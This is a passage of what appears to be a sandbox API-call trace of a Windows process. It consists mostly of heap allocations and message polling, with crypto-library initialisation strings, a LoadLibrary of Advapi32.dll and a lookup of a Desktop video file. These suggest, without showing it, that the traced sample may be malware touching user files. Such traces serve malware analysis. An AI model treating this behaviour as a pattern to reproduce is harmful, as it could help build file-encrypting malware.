[0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0187.382] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cb8 [0187.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0187.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e546c0 | out: hHeap=0x970000) returned 1 [0187.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0187.383] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0187.383] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0187.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0187.383] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54620 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0187.384] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0187.384] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0187.384] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54670 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0187.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54760 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0187.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0187.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0187.385] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0187.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54648 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0187.385] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546e8 [0187.385] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0187.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0187.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0187.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0187.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0187.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0187.386] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0187.386] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.386] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/kMN4z.mp4", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x970aab70, ftCreationTime.dwHighDateTime=0x1d5e0bc, ftLastAccessTime.dwLowDateTime=0x3a98f640, ftLastAccessTime.dwHighDateTime=0x1d5efc0, ftLastWriteTime.dwLowDateTime=0x3a98f640, ftLastWriteTime.dwHighDateTime=0x1d5efc0, nFileSizeHigh=0x0, nFileSizeLow=0x11660, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="kMN4z.mp4", cAlternateFileName="")) returned 0xa87250 [0187.386] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0187.387] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e546c0 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0187.387] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0187.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0187.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0187.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0187.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0187.388] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0187.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0187.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0187.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0187.388] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0187.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0187.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0187.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0187.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0187.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0187.389] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0187.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0187.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0187.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0187.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0187.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0187.389] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0187.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0187.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547d8 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0187.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54788 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0187.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0187.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0187.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0187.390] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0187.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0187.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0187.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0187.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0187.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0187.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.392] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0187.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.392] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0187.392] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0187.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0187.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0187.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0187.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0187.392] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0187.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0187.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0187.393] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e547b0 | out: hHeap=0x970000) returned 1 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54738 | out: hHeap=0x970000) returned 1 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0187.393] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.393] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0187.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0187.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0187.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54738 [0187.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0187.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0187.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0187.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.394] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0187.394] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0187.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0187.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0187.394] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0187.394] 